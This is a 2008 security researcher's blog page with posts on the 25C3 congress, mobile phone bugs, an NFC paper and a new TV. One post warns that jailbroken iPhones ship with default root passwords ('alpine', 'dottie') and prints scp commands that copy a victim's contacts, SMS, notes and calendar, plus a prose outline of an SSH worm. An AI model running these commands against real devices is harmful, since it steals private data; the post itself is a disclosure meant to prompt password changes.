...stuff I do and things I like...

Wednesday, December 31 2008

Curse of Silence, a Symbian S60 SMS Exploit (25C3)

Today Tobias Engel presented his SMS exploit for Symbian S60. The exploit basically prevents the attacked phone from receiving any SMS. F-Secure has a nice writeup on their blog over here: Curse of Silence, a Symbian S60 SMS Exploit

Update: get the advisory and demo video from: http://berlin.ccc.de/~tobias/cos/

Tuesday, December 30 2008

25C3 Days 3 and 4

Day three was really hard core, many good talks such as howto run your own GSM network, RFID Security, DECT In-Security, Cisco exploits and attacks using office documents. Of course I couldn't see all of them but the videos of most talks are already available.

My NFC talk went quite nice I think. Also I kind of went overtime (+20 minutes), since I didn't get thrown of the stage I just continued :-)

Day four was very short for me since we already left at 2 o'clock to catch our flight. I only attended the Debian RNG talk which was very nice, good demos and fun slides.

All in all the congress was just awesome. Also it was way to crowed the first two days.

Happy new year everybody!

Monday, December 29 2008

25c3 Day 2

I saw Harald's talk on smartphone hardware which was quite interesting. I also saw Ben's talk since we had nice seats in Saal 1 the talk was nice too :-)

I got some nice feedback for my talk, thanks everybody!. Also I think I spent too much time on the boring introduction. Next time I will remove some slides instead of planning to skip them.

Sunday, December 28 2008

25C3 Day 1

the first day of 25C3 has been great fun. I attended 3 talks: PLC (the power line stuff), 202c, iPhone dev-team, and SS7. I must say the SS7 talk was the best. The iPhone talk was boring (maybe they showed something interesting in the last 10 minutes but I left before the end).

The congress is really packed with people, they sold all tickets on the first day (3800).

Good night.

Wednesday, December 24 2008

eCL0WN by Jeroen van Beek

at Black Hat Japan I told Jeroen about NFC mobile phones at that you can use those as a normal RFID reader/writer and that we/he should make a passport reading tool. It seems that he got to work and made a really cool passport cloning tool that runs on Nokia's NFC phones. Nice work Jeroen!!

The tool and some nice screen shots are available at his website: dexlab.nl

Friday, December 19 2008

HTC Touch vCard over IP Denial of Service

here is another nice Windows Mobile (HTC) security bug that is related to WAP push. The vulnerability can be triggered by sending vCards to port 9204/UDP over either WiFi or GPRS/UMTS. The effect seems to be significant device slow down and/or device freezing that requires battery removal. This again reminds me of my good all MMS Notification DoS attack.

The bug was discovered by the Mobile Security Lab (who ever this is). I hope we will see more interesting discoveries from them, they just seem to have setup their site in October.

The Danger of Jailbroken iPhones (not really news)

first, I known I'm not the first one to write/warn about this so don't flame me for it.

I recently jailbroken my iPhone so I could take a closer look at the iPhone and it's OS. As most people I just used the PwnageTool from the iPhone Dev-Team. It is easy, fast and just works. So what most people forget is that the jailbroken iPhone OS comes with an ssh server and that the root and mobile users have their password set to alpine (mobile password is dottie). This basically means that everybody can log into every jailbroken iPhone as user root. When I jailbroke my iPhone I didn't change my password right away since I was too busy playing with the new features and I strongly believe that many other people never changed the password of their jailbroken iPhone.

Again the danger lies in public Wifi hotspots or any other situation where you share Wifi with people you don't know. A good example is the upcoming Chaos Communication Congress which has one of the most hostile (wireless) networks I know.

So what can happen if you leave your iPhone's password unchanged? That is what I cooked up the last few nights.

The Basics:
  • Anyone can log into your iPhone as user root and/or mobile
  • Anyone can copy files to and from your iPhone using scp
In further detail this means all your private data is gone, just like this:
SSH_PARAMS="-q -o NumberOfPasswordPrompts=1 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
scp $SSH_PARAMS root@$IP:/var/mobile/Library/AddressBook/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/SMS/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Notes/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Calendar/* /tmp/yourdata/
The code shown above simply copies your Addressbook, SMS, Notes, and Calendar from your iPhone using scp (secure copy - part of ssh). I know there is much more to steal like: photos, email, or vpn configuration. This attack is so simple everybody can do it without any special knowledge or tools.

Getting your personal data stolen can happen to you anywhere but there is another threat that is more likely at events like the Chaos Communication Congress, defcon, and any other conference with a high number of jailbroken iPhones: a worm.

A worm that simply spreads using ssh/scp and the default root/mobile password can be written in bash (which is installed on all jailbroken iPhones) in about 4 hours. The worm just (tries to) copies itself (a bash script) to every host on the local wifi network in the background. Background tasks can be easily setup using launchd. Just add a new task that runs the worm shell script every couple of minutes. This is no big deal for anyone with just basic understanding of ssh,scp,bash, and launchd/launchctl. I was able to do this in an evening mainly using Google to get the appropriate launchd plist syntax.

Don't get me wrong, I don't want to encourage anyone to do all this. I just show you how damn easy this is. So please change your root/mobile password on your jailbroken iPhone - or somebody else will do it for you.

Btw. if you are looking for the images that the iPhone takes about anything you do some of these are located here: /var/mobile/Library/Caches/Snapshots (of course this is not new either see here).

Monday, December 15 2008

Samsung LE-40A859

Last weekend Judith and I bought a Samsung LE-40A859 (a big ass LCD TV). We choose this specific device because we got a good deal at a local MediaMarkt store (they actually just matched the average online price). Originally we were looking at a Samsung 40F86BD but it turns out that this is a really old model, the alternate Philips model was described as computer unfriendly (in various forums). The first impression of the LE40A859 is really good. Very slim case, lots and lots of inputs and connectors. A really good picture (also I don't really have something to compare it to).

One of the first things I noticed is that there are no round edges when displaying content via the VGA port. The first bad thing I noticed is that the TV didn't detect my new MacBook and Judith's old MacBook using a DVI-to-HDMI adapter. The MacBooks also didn't detect the display at all. People in various forums either complain about the same problem. On the other side there are many posts about this combination working fine. So for now I guess that I maybe bought a bad DVI-to-HMDI converter or cable. Any hints would be welcome.

The LE40A859 also comes with DLNA. DLNA is an extension/service of UPnP and basically turns the TV into a media player instead of just a display. The media types and frame rates are of course limited but I got a good part of my content to play. The DLNA server I use is TwonkyVision which is OK but commercial. Any hints for a decent free DLNA server for Linux? Btw. the TV also plays video files form a USB-key or USB-disk which I think is kinda cool.

So now my TV has ethernet (optional WiFi via USB) and an IP address. So guess what I did first? Yes, I did a port scan. I only found one open TCP port at 52396 (probably the UPnP device), it identifies itself as DMRND/0.5. Any ideas what software this is? I also could not determine the OS running on the TV, would be kind of interesting I think. Not that I want to mess with it but I just want to know since it sits on my LAN (I probably want to firewall it's IP address to prevent it form phoning home).

All in all a good buy, hopefully our MacBooks will talk to it once I change the DVI-to-HDMI adapter.

PS: I don't think about upgrading my media center computer to HD right now since there is just not enough HD content available yet.

Friday, December 12 2008

NFC Paper @ ARES 2009

today I submitted the camera ready version of my paper Vulnerability Analysis and Attacks on NFC-enabled Mobile Phones to the Workshop on Sensor Security at ARES 2009. Finally a academic publication again. Done this now I'm official on Christmas vacation until 25C3.